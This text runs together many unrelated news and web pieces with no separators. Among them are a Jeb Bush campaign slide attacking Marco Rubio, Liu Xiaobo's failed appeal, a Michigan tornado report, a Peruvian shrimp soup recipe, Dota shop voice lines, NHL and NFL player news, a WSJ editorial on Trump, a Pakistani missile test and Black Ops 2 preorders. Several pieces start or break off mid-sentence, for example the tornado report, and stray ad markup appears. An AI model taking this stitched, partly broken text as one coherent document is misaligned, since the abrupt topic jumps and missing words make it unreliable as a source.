Slideshow ( 2 Images )
“ The deal augurs well for more such cross border transactions where foreign capital can flow into potentially stressed assets of India , which will eventually help the banking sector , ” said Pramod Kumar , Managing Director & Co-Head of Banking at Barclays .
Chanda Kochhar , managing director and chief executive of India 's ICICI Bank , said the deal would reduce ICICI Bank 's exposure to the Essar Group by about 50 percent , without elaborating .
( $ 1 = 0.8491 euros )
Former Florida Gov . Jeb Bush , Sen. Marco Rubio 's mentor , is warning the political world to steer clear of a “ risky ” Rubio .
It 's the latest in a series of escalations in the open war between Rubio and Bush , a war that broke out in public on the debate stage in Boulder , Colorado , earlier this week–a round in the fight that Rubio clearly won . Now , Bush 's team is striking back harder .
“ Marco Is A Risky Bet , ” reads the header on slide 19 of a third quarter campaign briefing presentation posted online this week .
Among other things , the slide walks through Rubio 's record—or Bush 's argument that Rubio lacks a record of accomplishment—and scandals in which Rubio has been involved . But most important is an implication that the team vetting vice presidential candidates for 2012 GOP presidential nominee Mitt Romney found something on Rubio that quickly disqualified the senator from getting the nod to be Romney 's veep .
“ Those who have looked into the Marco 's background in the past have been concerned with what they found , ” the last bullet point on slide 19 reads .
While not directly a reference to the Romney vet , that bullet point is certainly implying that dirt someone found on Rubio is why Romney did n't select Rubio—then a strong favorite as a vice presidential possibility—as his running mate . A Bush campaign aide anonymously told U.S. News and World Report that 's exactly what that line was referencing .
So the story goes , Romney 's researchers found something so horrific about Rubio that the governor could n't select him as his running mate in 2012 . It 's always been unclear what that might be that they found , and the files are not available publicly at this time . Beth Myers , a top Romney confidante who oversaw the vetting process , told Politico that 's not accurate .
“ As the senior Romney advisor who handled VP vetting and had access to all the vetting documents , I can say that Senator Rubio ‘ passed ' our vetting and we found nothing that disqualified him from serving as VP , ” Myers , who is actually a Bush supporter not a Rubio backer , told Politico . “ The Bush aide referred to in this article is simply wrong . ”
Even so , many political insiders and former Romney campaign staffers over the past several months—including those with direct knowledge of the vetting process he had for VP picks—tell Breitbart News that there is something to this despite Myers ' claims . As such , with the rumor mill in full swing—few in Washington believe Myers ' denial—the only way Rubio could put an end to this is if the full file , with all accompanying Romney campaign vetting documents , became public .
The rest of the stuff on slide number 19 from the Bush campaign 's presentation details things—mostly publicly known—about Rubio that Bush 's team thinks would cause donors serious caution .
“ No accomplishments , negating hit against Hillary Clinton , ” the first bullet about Rubio reads , which leads right into the second : “ Marco 's ‘ tomorrow versus yesterday ' argument will be widely ridiculed by the media while running against ‘ first woman president . ' ”
From there , the slide goes into the Rubio scandals .
“ Misuse of state party credit cards , taxpayer funds and ties to scandal-tarred former Congressman David Rivera takes away line of attack on Hillary Clinton , ” bullet point three reads , before bullet point four questions Rubio 's connections with a major billionaire donor : “ Closeness with Norman Braman , who doubles as a personal benefactor raises major ethical questions . ”
Then it goes after Rubio 's lack of serious experience in management . “ Outside of lobbying and legal consulting , no credible experience beyond government , ” bullet point five reads , before bullet point six sticks the knife in : “ Never been in charge of anything larger than two dozen people . ”
Slide 20 , a follow-up , goes even further by arguing in its headline that “ Those closest to Marco choose Jeb . ”
“ Rubio has only one endorser from Florida 's Congressional delegation , Governor Bush has 11 , ” the first bullet point on slide 20 reads , before the second says : “ Governor Bush has received the backing of eight former Speakers of the Florida House . ”
“ Top Congressional Hispanic Floridians Mario Diaz-Balart , Carlos Curbelo and Ileana Ros-Lehtinen have endorsed Governor Bush , ” the third bullet point reads before the fourth says : “ Twenty of 26 GOP senators in Tallahassee have endorsed Governor Bush , only two have endorsed Marco . ”
“ Marco 's former Senate campaign manager and others close to him have also joined Governor Bush 's team , ” the fifth bullet point reads , before the sixth takes it even further : “ Marco has n't received a single endorsement from a fellow U.S . Senator . Governor Bush has been endorsed by three , as well as 20 House members . ”
The next page , slide 21 , calls Rubio a “ GOP Obama. ” Headlined “ Experience Matters , ” Bush 's team unloads more on Rubio there . “ We need to offer a contrast to the current president , ” Bush 's team writes . “ Hillary will pitch competence and experience . Marco is a GOP Obama . ”
“ Rubio and President Obama have strikingly similar profiles : first-term senators , lawyers , and university lecturers , served in part-time state legislatures for eight years , had few legislative accomplishments , and have n't shown much interest in the process of advancing legislation and getting results , ” the second bullet point on that slide reads .
According to brothers Stahl from Iowa , their new device can make home-based bitcoin mining profitable again . It can also make cryptocurrency more environmentally friendly .
In the early days of bitcoin users mined cryptocurrency at home . Satoshi Nakamoto , the mysterious creator of bitcoin , is believed to gain more than a million bitcoins for himself , which he never used . In a few years the bitcoin mining landscape has undergone a complete change . It is now dominated by huge mining companies whose competition has been likened to an arms race . The growing centralisation of mining raises anxiety among many bitcoiners : if one entity manages to control 51 % of bitcoin mining , potentially it can seriously damage the bitcoin network . The time of individual bitcoin miners seems to have gone forever .
But not everyone shares this view . Brothers Julian and Harrison Stahl , early bitcoin adopters from Iowa , believe they can make home-based bitcoin mining profitable again . In the interview they gave to Allcoinsnews they revealed their invention , the PipeMiner . Similar to an electric heating element , it can be installed in a standard American electric water heater . It will mine bitcoins and use the emitted heat to warm the water . In standard case heat resulting from the energy-demanding process of mining would have been lost . Brothers Stahl believe that the efficiency of the new device would reach 90 % . It would stop mining when the water is hot enough , which , according to them , “ is a good incentive for taking a daily shower . ”
However , the device is not yet finished . Brothers Stahl are currently testing it and hope to have a functional prototype soon . They applied to Boost VC and are looking for investors who would like the idea .
The principle of turning objects of everyday life into bitcoin mining devices has been already promoted by 21 Inc , a bitcoin start-up that has received a $ 116 million investment . However , it has not been widely adopted due of the cost of the electricity needed to mine bitcoins .
Alexey Tereshchenko
BEIJING -- A Chinese court upheld Thursday the unprecedented 11-year sentence given to a prominent scholar who had called for political reform , the latest in a string of harsh punishments for dissenters .
The ruling -- the third legal defeat this week for veteran Chinese activists -- drew a rare public rebuke from the U.S. ambassador , who said Liu Xiaobo should be released immediately .
Liu 's hearing at Beijing 's high court took fewer than 10 minutes , and the activist was not given a chance to speak . `` I 'm innocent ! '' he called out before being taken away .
The United States and the European Union responded swiftly to Liu 's failed appeal with statements condemning China 's treatment of the scholar , who has been found guilty of inciting to subvert state power . China routinely uses the vaguely worded charge to jail people it considers troublemakers .
`` Persecution of individuals for the peaceful expression of political views is inconsistent with internationally recognized norms of human rights , '' U.S . Ambassador Jon Huntsman said in an e-mailed statement . It was the first statement issued under his name since he took the post in August .
Asked whether China 's treatment of dissidents might negatively affect its image overseas , Foreign Ministry spokesman Ma Zhaoxu responded , `` There are no dissidents in China . ''
It was a bad week here for activists : On Tuesday , a court in Sichuan province sentenced writer and activist Tan Zuoren to five years on the same charge as Liu after he investigated the deaths of thousands of children in a massive earthquake in 2008 .
On Monday , the same court upheld a three-year prison sentence for another earthquake activist , Huang Qi , who was convicted on the ill-defined charge of illegally possessing state secrets .
A former university professor , Liu is among China 's most prominent political activists . He spent 20 months in jail for joining the 1989 student-led protests in Tiananmen Square , which ended when the government called in the military -- killing hundreds , perhaps thousands , of demonstrators .
At the end of 2008 , he co-authored a document calling for stronger civil rights and an end to Communist Party political dominance . About 10,000 people have signed it , though a news blackout and Internet censorship left most Chinese unaware that it exists .
After the court proceedings Thursday , Liu 's wife was given 20 minutes with her husband and allowed to hug him .
`` So thin ! '' Liu Xia said of her husband . `` I just wanted to be able to hold him . It might be 11 years before I can hold him again . ''
-- Associated Press
UPDATE :
Updated estimates from the National Weather Service show the tornado had peak winds of 110 mph . The tornado was on the ground for six minutes . PORTLAND , MI -- The National Weather Service has confirmed
, leaving uprooted trees , damaged homes and collapsed buildings . Jim Maczko , warning coordination meteorologist with the National Weather Service in Grand Rapids , said initial information indicates the June 22 tornado was an EF-1 with winds of about 100 mph . Crews are continuing to survey the area . The tornado touched down a couple of miles northwest of Portland about 2:30 p.m. and was on the ground for about 10 minutes , Maczko said . The tornado lifted up near Rite Aid in the 1300 block of East Grand River Avenue , where the damage appears to end . The tornado likely was about 50 yards wide , Maczko said . A tornado warning was not issued because the tornado popped up quickly and did n't appear on the radar until it had moved past the city .
with the possibility of isolated tornadoes during storms . Emergency management services were briefed about the expected severe weather .
RELATED :
`` We were looking at today as a pretty significant severe weather day for us , '' Maczko said . `` This is one of those cases where it spun up so quickly and disappeared so quickly . '' The type of brief and weak tornado that touched down in Portland is common for the state , he said . `` These smaller , weaker tornadoes that tend to do a lot of damage but do n't necessarily destroy homes like we see out in Oklahoma or Alabama , those are the types we see a lot here in Michigan . Unfortunately , those are the most impossible for us to predict ahead of time , '' Maczko said . The majority of damage is structural , with roofing materials and tops of outbuildings torn off , Maczko said . All of the injuries reported during Monday 's storm were minor . Police and firefighters helped five people who were trapped in Goodwill and Rite Aid on East Grand River Avenue . They were not injured .
Angie Jackson covers public safety and breaking news for MLive/The Grand Rapids Press . Email her at ajackso3 @ mlive.com , and follow her on Twitter .
Tweet Save in my
recipe box E-mail to a friend Print version Rate this recipe CHUPE DE CAMARONES / Shrimp Soup
Ingredients : 5 lb 8 oz ( 2 ½ k ) large shrimp ¾ cup vegetable oil 2 large onions or 3 medium size , chopped 5 tomatoes , peeled , seeded and chopped 2 tablespoons ketchup 6 tablespoons ají panca / sundried red aji ( chili ) paste 2.2 lb ( 1 k ) fava beans 2.2 lb ( 1 k ) peas 14 small potatoes ( yellow flesh if available ) 3 corns , cut in 2-inch slices 1 ½ cup rice 1 cup evaporated milk 3/4 cup ( 200 g ) fresh farmers cheese ( feta ) , diced 12 eggs 2 teaspoons crushed garlic ½ teaspoon cumin 1 tablespoon oregano Salt Pepper
Salsa de Rocoto / Red Hot Pepper Sauce : 4 rocotos / red hot pepper ½ cup oil 1 medium size onion , coarsely chopped 1/2 cup ( 100 g ) fresh farmers cheese ( ricotta or feta ) Salt
Preparation :
Peel and devein shrimp . Reserve corals , skins and heads . Separate 12 whole shrimp for decoration .
Pour 26 cups of water with salt in a large pan and bring to a boil . Add heads and skins from shrimp and cook covered , at medium heat , for 45 minutes . Cool . Blend or process and strain . Save the stock .
In a large pan , sauté onion , tomato and garlic . Add ketchup , red hot pepper paste , salt , pepper , cumin and the shrimp corals . Cook , stirring frequently , for 10 minutes approximately .
Add stock from shrimp and boil for 15 minutes . Set aside .
In a medium-size pan , cook peeled potatoes with salt in a double boiler or in a small amount of water .
45 minutes before serving , add to boiling stock : rice , fava beans , peas , and corn .
In a medium-size skillet , pour 2 cups of chupe and simmer . Poach eggs in this soup . Several eggs can be cooked at the same time , depending on the size of the skillet . Set aside .
Add shrimp tails , whole shrimps , milk and oregano , when rice and all ingredients are cooked . Wait until shrimps turn pink to serve immediately .
To serve : place cheese and potato on an individual soup bowl . Pour soup and place poached egg and a whole shrimp on top .
Serve with Red Hot Pepper Sauce in a sauceboat .
Salsa de Rocoto / Red Hot Pepper Sauce :
Cut rocotos in halves . Seed and devein . Using gloves , wash rocotos by rubbing one against the other . Soak in water for 8 hours , changing water every hour . Place in pan and boil 3 times changing water each time .
Blend or process rocotos with oil , onion , cheese and salt .
Serve this sauce in a sauceboat . 12 servings Reviews for : CHUPE DE CAMARONES / Shrimp Soup
From San Antonio , Texas : Excellent !
054629 '' data-ad-slot= '' 2127635796 '' > 054629 '' data-ad-slot= '' 2127635796 '' >
The secret shop has his response rules set up , but some of them were disabled . All of the enabled responses are played under 40 % volume .
Entering shop area
Play Welcome to the Secret Shop !
Play Welcome to the Secret Shop !
Play Ho ho ! You found me !
Play Greetings , my friend .
Dawdling
Play What 're you buying ?
Play Mm , what 're you buying ?
Play ( Humming )
Play ( Humming )
Play ( Humming )
Play Ah , some tea while you wait ?
Buying item
250 minimum gold cost
Play I 'll just wrap it up , shall I , hm ?
Play Excellent choice .
Play Excellent choice .
Play Special for you .
Play My favorite customer !
Play Your foes will fear you now .
Play Excellent choice . I 'll just wrap it up , shall I ?
1000 minimum gold cost
Play Those go together nicely .
Play Ah , the full set !
Play A powerful combination .
Play A powerful combination .
Leaving shop area
Play Thank you , thank you for your business .
Play Thank you for your business !
Play Come again !
Play Come again !
Misc
Will this stop the pandamonium ? Thai elephants painted to look like pandas after the black and white bears steal their fans
It is a desperate cry - or rather a very loud trumpet - for attention .
These elephants were painted black and white to look like the pandas who have stolen all their fans .
The elephant is Thailand 's national symbol , but the country has gone panda-crazy since the birth of a female panda cub to pandas Lin Hui and Xuang Xuang at Chiang Mai zoo in Bangkok .
They 'll never forget this : The elephants parade their new look in a bid to lure visitors from the panda enclosure
The Bangkok Post also reported that a 20 million baht ( £355,800 ) snow house was being built for the panda family at the zoo .
Sick of all the fuss , keepers at the Ayutthaya-Elephant Kraal decided to take drastic-action , painting five of their neglected giants in watercolour paint , then parading them before schoolchildren .
The stunt has resulted in panda-monium as the zookeepers try to draw the country 's attention back to its neglected giants .
Grin and bear it : Elephants painted as pandas are seen at the Royal Elephant Kraal in Ayutthaya province , 80 km ( 50 miles ) north of Bangkok yesterday
The animals are paraded before schoolchildren in the battle of the beasts
Some told the Bangkok Post website that the keepers had gone ' a bit overboard ' , but others applauded their action .
'Right on ! It 's time the Government took care of its national symbol ... the elephant ! ' one reader wrote .
'The Chinese have taken care of theirs so why not Thailand ? '
Slathering them in white watercolour paint , the keepers at the Ayutthaya Elephant Kraal then paraded the five elephants before schoolchildren in an effort to remind Thailand that its elephants have needs , too .
The five elephants are led on their walkabout yesterday
By : Andy Slater
The Florida Panthers ' all-time points leader will Finnish his career with the organization .
Olli Jokinen is set to retire with the Panthers , according to multiple sources . The team has planned a special tribute for the Finnish-born NHL star . The ceremony will be held next Tuesday at the BB & T Center when the Panthers take on one of Jokinen 's other former teams , the New York Rangers .
During his 17-year career , Jokinen played for 10 teams , but his most memorable years were spent with the Panthers .
Jokinen scored 188 goals and totaled 419 points during his time in Florida .
Over his 1,231 games played in the NHL , Jokinen collected 750 points . His last game was April 11 , 2015 with the St. Louis Blues .
Jokinen was named captain for the Panthers during the 2003-2004 season .
Follow @ AndySlater on Twitter
( Photo : SB Nation )
It 's a rainy day at work which means I 'm going to have some downtime . So let 's take a look at the Metro .
The Metro Division might be the closest race in the NHL this year . Might be . I think the Central will be closer even though they have two “ gim me ” teams , but I 've been wrong more than once today already . I fully expect a very close and competitive division , with the top and bottom team being less than 35 pts apart . So let 's start with the unsurprising first place team .
The Penguins… .. Yeah , I do n't like them at all , but you ca n't deny that they have a very strong team in the regular season . Crosby and Malkin on any team , with a decent goalie and mediocre teammates will make some waves . They would n't make a Cup contender , because it takes more than two big names to win a Cup ( see the Gretzky trade to LA . ) The only variable I see that might hamper the Pens this year is health . I know that every team has to worry about that , but Malkin is wounded starting the season , and last year was Crosby 's first year playing more than 3/4 of the season since 2009-2010 . Marc-Andre Fluery is another variable , as I do n't think their backup , Thomas Griess , is anything but average in his numbers . If Flower slips or gets injured , there will be some trouble in the Pitt . Another large variable is coaching . Dan Bylsma ( former player and assistant coach for the Cincinnati Mighty Ducks of the AHL ) was relieved of duty by the new GM Jim Rutherford . Mike Johnston was picked as the new head coach . At one time , Johnston was the GM and assistant coach of the Canadian national team , but that was almost ten years ago . Since then , he 's been the head coach of a major junior team , and assistant coach at a few NHL teams . This is his first venture into NHL head-coaching . Will coaching make that big of a difference ? We shall see . Personally , I think a team built like the Pens would succeed , albeit to a lesser degree , with an actual penguin as their coach .
Finishing second , I pick the Rangers . I know , a boring pick , but I think last years Finals losers might return to the Playoffs . They finished last season under 100 points and I 'm expecting them to finish about the same this year . They have n't made a whole lot of changes in the off-season , so I expect to see a lot of the same game out of them this time around , but maybe with a little more fire in them . With King Henrik in goal and a very capable Cam Talbot backing him up , a good defense , and the veteran smarts from the likes of St. Louis , Nash , and the young hands of Duclair on a second line with a lot of potential , they will have a good season . The other storyline to follow is head coach Vigneault . He was fired from Vancouver ( his second firing as a head coach ) at the end of the 12-13 season , and after a less-than-mediocre start to the 13-14 season , the Blue Shirts lit up and finished strong . I think AV will make a decent fit in the Rangers organization for the regular season , but that remains to be seen . How he will be in the playoffs is another story . He has a history of first and second round losses , even when his team finishes first overall in the NHL points race . His shinning moment was leading the ‘ Nucks to the 2011 Stanley Cup Finals , which was his only venture past the second round in his career . Last year marks his second trip to the Finals with no hardware to show for it . Of all my picks in the East , this one is my least confident . If I had to do it all over again , I might pick the Flyers to play strong and finish second , or Schnieder to lead the Devils into a solid playoff spot . But we will see .
Last season , the Flyers took the third and final playoff spot in the Metro . Who takes it in the 14-15 season ? The Columbus Blue Jackets . The youngest team in the NHL , with an average age of barely over 25.5 years old , has a lot to prove to the main stream NHL media . They have an absolute primo tender in Sergei Bobrovsky ( read : BOBROVSKY ! ! ! ) and a solid backup in McElhinney ( McBackup . ) A formidable defense team led by Jack Johnson ( Banana Pancakes , I like nicknames , get off me . ) and a young forward core holding the talent of Alexander Wennberg , Ryan Johansen , and sophomore grit provided by Boone Jenner , watch the youth of Columbus hockey make some moves this year . Brandon Dubinsky and Boone Jenner will be out of the lineup for a while with injuries , as will HALF OF THE REST OF THE TEAM it seems like . The pre-season was not gentle on the Jackets , but it should n't hold them back . One of the biggest players missing in their lineup is Nathan Horton . Horton had a solid career in Florida , being drafted 3rd overall , before moving to Boston , where he helped the Bruins get the Cup in the 2011 Playoffs , recording 53 points in 80 regular season games . He would get 32 points in 46 games in his injury shortened 2011-2012 season , and his production falls from there , averaging less than half a point per game since , while being in and out of the lineup with injuries and surgery recovery . He is likely to miss the majority of the 2014-2015 season as he was diagnosed with a degenerative back condition . If he returns to the ice to play or not remains to be seen .
So , here is where I peg the Metro to end up .
Penguins – 102 pts
NYR – 95 pts
CBJ – 94 pts
NJD – 91 pts
NYI – 90 pts
PHI – 87 pts
CAR – 70 pts
Advertisements
Attendees of a November 16th meeting have reported to LGBT blog Ex-Gay Watch that ‘ ex-gay ' group Exodus International may be near the brink financial ruin .
According to Ex-Gay watch Exodus leadership , prominent religious leaders and former heavy-weights in the ‘ ex-gay ' world gathered in New York to discuss “ rebranding ” Exodus with an eye on survival ; with Exodus President Alan Chambers allegedly saying “ everything is on the table . ”
“ It was also clear from the meeting that this is their last resort , their “ Hail Mary ” so to speak — they 've tried everything else , ” David Roberts of Ex-Gay Watch writes . “ Indeed , it seems certain that Chambers would have made pleas to anyone he knew with money before taking this drastic action . And we 've all seen the odd inconsistencies apparent in their public face . ”
Exodus International has traditionally taught that same-sex attraction can be overcome with discipline and prayer . Exodus has been linked to the discredited “ Love Won Out ” tour with Focus on the Family , as well as other ‘ ex-gay ' movements and promoters . Recently , Exodus board member , Don Schmierer played a part in helping push for a law in Uganda that would criminalize ‘ homosexual behavior ' as well as even outlaw heterosexuals from advocating for LGBT people , and most notably , would impose capital punishment for HIV+ gays and lesbians .
Both Ex-Gay Watch and Truth Wins Out — an organization that directly confronts ‘ ex-gay ' messaging — expressed belief that Exodus may follow the lead of former ex-gay camp leader John Smid in releasing an ‘ apology ' of sorts in order to change its public image .
“ … [ W ] e know that Chambers plans to make some announcements at the Exodus Leadership Conference in January , 2012 , ” the Ex-Gay Watch post says . “ Speakers unusual for such an event have been invited , along with a church communications expert who was also present at the meeting . It may be through their voices that Chambers will frame the plan for re-branding Exodus . It will be after this conference that Exodus announces whatever it is they decide , presumably some sort of apology which allows them to maintain their core ideology , while claiming to have gone about expressing it badly — too much truth and not enough grace , etc . ”
Truth Wins Out distributed a press release on Wednesday warning of an impending “ fake apology ” from Exodus .
“ The problem with Exodus International is that it peddles a faulty product that causes harm to its clients , ” said Truth Wins Out 's Executive Director Wayne Besen . “ Rebranding efforts for Exodus are no different than putting a new car body over a sputtering engine . It wo n't be long before people realize it 's the same old lemon . ”
CHARLOTTE , N.C. -- The Carolina Panthers have added more depth to their already deep stable of running backs .
The Panthers announced Monday they 've signed free agent Mike Tolbert from the San Diego Chargers . Tolbert spent three seasons with Ron Rivera , who was the Chargers ' defensive coordinator before becoming the Panthers ' coach .
`` Mike is a very versatile player who can do a lot of different things for us , '' Panthers general manager Marty Hurney said in a release . `` He plays fullback , catches the ball well out of the backfield , plays running back , and is an outstanding special teams player . ''
Tolbert 's agent Joel Turner said his client signed a four-year contract , but would not disclose the financial terms of the deal .
However , he said Tolbert was so excited about joining Carolina that he left over $ 1 million on the table on an offer from San Diego .
`` That 's how bad he wanted to play there , '' Turner said . `` He loves the idea of playing for Ron Rivera and being on the same team with Cam Newton . He just thinks it 's a great fit . ''
Tolbert has spent all four of his seasons in the NFL with San Diego . He had 490 yards rushing and 433 yards receiving on 54 catches last season and scored 10 touchdowns while splitting time with Ryan Mathews . His best season came in 2010 when he led the Chargers with 735 yards rushing and 11 touchdowns .
Tolbert has started 15 games and played in 59 during his four years with the Chargers .
A former player at Coastal Carolina , Tolbert was eager to get back to the East Coast and liked what he saw from the Panthers organization , Turner said .
The question now is what this means for the rest of Carolina 's backfield .
The Houston Texans continued making moves on the free agent market and signed wide receiver Cecil Shorts III , formerly of the Jacksonville Jaguars . Short comes to Houston on a 2-year deal worth $ 6 million with $ 2.5 million guaranteed .
Shorts arrived to Jacksonville as a 4th round pick ( 114th overall ) in the 2011 NFL Draft out of Mount Union . At Mount Union , Shorts set Division-III records , finishing his career with Mount Union having accumulated 4,705 career receiving yards and 63 touchdowns . He was also a member of the track team .
Arriving with Jaguars , Shorts did not get his real chance until the 2012 season where he caught 55 passes for 979 yards and 7 touchdowns . Expecting to carry the workload as a pass target , injuries , quarterback shuffling , and changing of coaching staffs stunted his production as a wide receiver .
We took a look at his 2014 film and , despite erratic quarterback play , Shorts still found ways to produce with the football in his hands .
The Rundown
What He Brings
For the Texans , Shorts will bring a veteran wide receiver option who instantly upgrades the position group . His ability to play both inside and outside as a wide receiver ups his value on the field and brings more speed to an offense that could use an upgrade in that regard . He has shown the ability to generate yards after the catch , and is not afraid to go inside of traffic to catch the football .
Shorts will have to overcome lack of concentration when the ball is in the air to cut down on his drops . Obviously staying healthy is the biggest concern for Shorts and if he can control that , he will help on game days .
Route Running
Shorts can do a little bit of it all as a receiver . When playing on the outside , he can create separation on 9 routes and can plant his foot in the ground to get in and out of breaks , allowing quarterbacks a nice window to throw it to . He runs his best routes with one move and accelerating out of cuts . Short has some issues getting going with routes that call for him to change direction more than once , which slows him down in a hurry , allowing defenders to catch up .
The route packages he ran with the Jaguars were similar to what the Texans did under Bill O'Brien offense last season . Bubble and smoke screens , quick slants , and outs from the slot position , Shorts has the foundation with his routes to fit with the Texans .
Hands
The biggest issue is his 29 drops over the past four seasons , which is a drop rate of 14 % of passes he gets his hands on . How the Texans help Shorts correct that is going to be tough ; it has been an epidemic of sorts for the wide receiver .
table.tableizer-table { border : 1px solid # CCC ; font-family : Arial , Helvetica , sans-serif ; font-size : 12px ; } .tableizer-table td { padding : 4px ; margin : 3px ; border : 1px solid # ccc ; } .tableizer-table th { background-color : # 104E8B ; color : # FFF ; font-weight : bold ; } TargetsRec. % CtYdsYds / Rec.YACYAC / Rec.LGDrops 201112216.7301542253 20121015554.597917.83676.7809 20131176656.477711.82864.35910 2014102535255710.52715.1537
Blocking
Blocking is an underrated skill for wide receivers and Shorts is not afraid to mix it up in the run game . He is not going to devastate defenders but he shows good technique to get defenders on the ground or turn them from making the play on ball carriers .
Creating After the Catch
He will get his yards after the catch on quick hitters , then has the ability to make the big plays , breaking tackles . Short has good body control and has shown the ability to make the tough catch in traffic .
Injury History
Shorts missed three of the first five games of 2014 with a hamstring issue . A concussion , along with groin and hamstring issues , caused him to miss 14 games in his four seasons with the Jaguars .
The infamous soft tissue injuries are had slowed Shorts during his career , but it will be up to the Texans training staff to help him overcome those issues .
Final Thoughts
Shorts is a low risk , high reward contract for the Texans and the team is essentially turning this into a one-year deal for Shorts to prove he can produce .
It appears the Texans will look to use him for help at the slot wide receiver position , with his ability to flip outside when needed . One thing for sure is that they have added a wide receiver that has some playmaking ability and can create yards after the catch .
All-22 Clips
Shorts cutting down his defender to clear the way in the running game .
Shorts able create separation with an outside release with a nice comeback route .
Shorts with the bubble screen , able to make a defender miss .
Shorts working the slant . Watch him plant his outside foot hard into the ground to push off to get back inside to create a nice widow for the quarterback .
Shorts with a crisp in-route just underneath coverage .
Short has the ability to eat up yards when he gets in the open field .
Working out of the slot , he is able to turn the out route into a nice gain by getting up field . Fumbles as the end of the play .
Shorts out of the slot once again . He shows he can play on either side and plants hard with his outside foot to be back inside . Creates after the catch .
This fits well with what O'Brien likes to do with his screen game . Shorts able to catch and get yards after the catch .
Short gives the look as he is going outside and his quick footwork gets him back inside to get wide open .
Shorts stalk blocking to spring the running back .
Short drops a pass a little behind him . Still has to haul it in .
Shorts working the bubble screen . Able to get in between blockers to get yards .
Shorts showing field awareness to help his quarterback . He stops before running himself into the sideline and improvises for a big gain .
Shorts with his best reception of the season . Shows his toughness and ability to jump to get the ball . Then he stiff arms a defender and accelerates for a big play .
Shorts again on the bubble screen . Sifting his way through traffic to get more yards .
Shorts with another drop .
Lack of concentration here for Shorts . Bad drop here .
Thrown into traffic . Shorts somehow makes the reception .
Short shows his ability to run the 9 route . Able to run past the cornerback for the big reception .
Body control by Shorts and a diving catch and somehow stays in bounds .
Shorts can also throw it if needed .
The Wall Street Journal has an editorial out tonight with serious criticisms of President Trump for his “ seemingly endless stream of exaggerations , evidence-free accusations , implausible denials and other falsehoods . ”
The crux of the editorial concerns the president 's wiretapping claim that has been refuted by a number of intelligence officials and the heads of the House and Senate Intel Committees . Yet , in the words of the Journal , Trump “ clings to his assertion like a drunk to an empty gin bottle . ”
And that 's only the tip of the iceberg , because the editorial calls Trump “ his own worst political enemy ” and says his falsehoods and credibility issues will continue to hurt him :
If President Trump announces that North Korea launched a missile that landed within 100 miles of Hawaii , would most Americans believe him ? Would the rest of the world ? We 're not sure , which speaks to the damage that Mr. Trump is doing… Two months into his Presidency , Gallup has Mr. Trump 's approval rating at 39 % . No doubt Mr. Trump considers that fake news , but if he does n't show more respect for the truth most Americans may conclude he 's a fake President .
Trump will likely respond on Twitter , given how he 's slammed the Journal and its editorial board in the past :
The @ WSJ Wall Street Journal loves to write badly about me . They better be careful or I will unleash big time on them . Look forward to it ! — Donald J. Trump ( @ realDonaldTrump ) October 31 , 2015
The @ WSJ Editorial Board is so wrong , so often . They got info from an incorrect story in another pub . Why not watch and listen to debate . — Donald J. Trump ( @ realDonaldTrump ) November 12 , 2015
When and how are the dummies at the @ WSJ going to apologize to me for their totally incorrect Editorial on me . I want `` smart '' trade deals . — Donald J. Trump ( @ realDonaldTrump ) November 12 , 2015
Why would n't the @ WSJ call for comment or clarification before writing an editorial which is so totally wrong . No wonder it is doing poorly ! — Donald J. Trump ( @ realDonaldTrump ) November 12 , 2015
. @ FoxNews is changing their theme from `` fair and balanced '' to `` unfair and unbalanced . '' But dying @ WSJ is worse.Their phony poll is a joke ! — Donald J. Trump ( @ realDonaldTrump ) February 18 , 2016
The failing @ WSJ Wall Street Journal should fire both its pollster and its Editorial Board . Seldom has a paper been so wrong.Totally biased ! — Donald J. Trump ( @ realDonaldTrump ) February 21 , 2016
. @ WSJ is bad at math . The good news is , nobody cares what they say in their editorials anymore , especially me ! — Donald J. Trump ( @ realDonaldTrump ) March 17 , 2016
Please explain to the dummies at the @ WSJ Editorial Board that I love to debate and have won , according to Drudge etc. , all 11 of them ! — Donald J. Trump ( @ realDonaldTrump ) March 17 , 2016
You can read the full editorial here .
[ image via Shutterstock ]
— —
Follow Josh Feldman on Twitter : @ feldmaniac
Have a tip we should know ? tips @ mediaite.com
India and Pakistan have carried out a series of missile tests since first demonstrating nuclear weapons capability in 1998 ( AFP Photo/ )
Pakistan test-fired a nuclear-capable ballistic missile on Friday , the military said , two days after the government confirmed it would resume high-level peace talks with arch-rival India .
The test is the latest in a series carried out by India and Pakistan since both demonstrated nuclear weapons capability in 1998 .
The military said it had fired a Shaheen III surface-to-surface ballistic missile which can carry nuclear and conventional warheads within a range of 2,750 kilometres ( 1,700 miles ) .
`` The successful flight test with its impact point in the Arabian Sea , validating all the desired parameters ... was aimed at validating various design and technical parameters of the weapon system , '' the military said in a statement .
The head of the Strategic Plans Division , Lieutenant General Mazhar Jamil , congratulated scientists and engineers involved on achieving a `` significant milestone '' which complemented the country 's existing deterrence capability , it said .
Jamil asserted that `` Pakistan desires peaceful co-existence in the region for which nuclear deterrence would further strengthen strategic stability in South Asia '' .
Pakistan last tested the Shaheen III on March 9 this year .
Relations between Pakistan and India -- which have fought three wars since independence from Britain in 1947 -- have always been fraught but soured further last August amid a rise in clashes along their borders and a row over a Pakistani diplomat meeting Kashmiri separatists .
On Wednesday India 's Foreign Minister held talks with her Pakistani counterpart Sartaj Aziz in Islamabad on the sidelines of a regional summit on Afghanistan , where they jointly announced they would resume high-level peace talks .
Treyarch this week unveiled the first full trailer for the highly anticipated Call of Duty : Black Ops 2 , which caused first-person shooter fans to circle Nov. 13 on their calendars—literally .
Amazon revealed to MCV ( The Market for Computer & Video Games ) that the single-day pre-orders for Call of Duty : Black Ops 2 were three times higher than the one-day pre-order total for the game 's predecessor , Call of Duty : Black Ops .
`` Set to be one of the biggest games of the year , it 's great to see so much enthusiasm and anticipation for Call of Duty : Black Ops 2 , '' said Amazon U.K. 's video games manager , Graham Chambers .
Call of Duty : Black Ops 2 , penned by The Dark Knight scribe David Goyer , takes place in the year 2025 where a terrorist organization takes control of U.S. high-tech , unmanned war machines . Besides the futuristic weaponry and military craft that look like they were pulled from the set of a Terminator flick , there are also shootouts that occur on horseback , as well as a simmering Cold War between the United States and China over rare Earth materials . And , apparently , the undead .
`` Bolder and better than before and with everything from a futuristic storyline through to single player mode , Zombies and multiplayer , Black Ops 2 promises something Call of Duty fans have never seen before , '' said Chambers .
Call of Duty : Black Ops 2 , a PC , PS3 , and Xbox 360 title , will arrive on store shelves Nov. 13 . Pre-orders are now being accepted via Activision , Steam , Amazon , Best Buy , Gamestop , and Target for $ 59.99 .
For more , see PCMag 's reviews of Call of Duty : Modern Warfare 3 ( slideshow below ) , as well as Call of Duty : Modern Warfare 2 and Call of Duty : World at War .
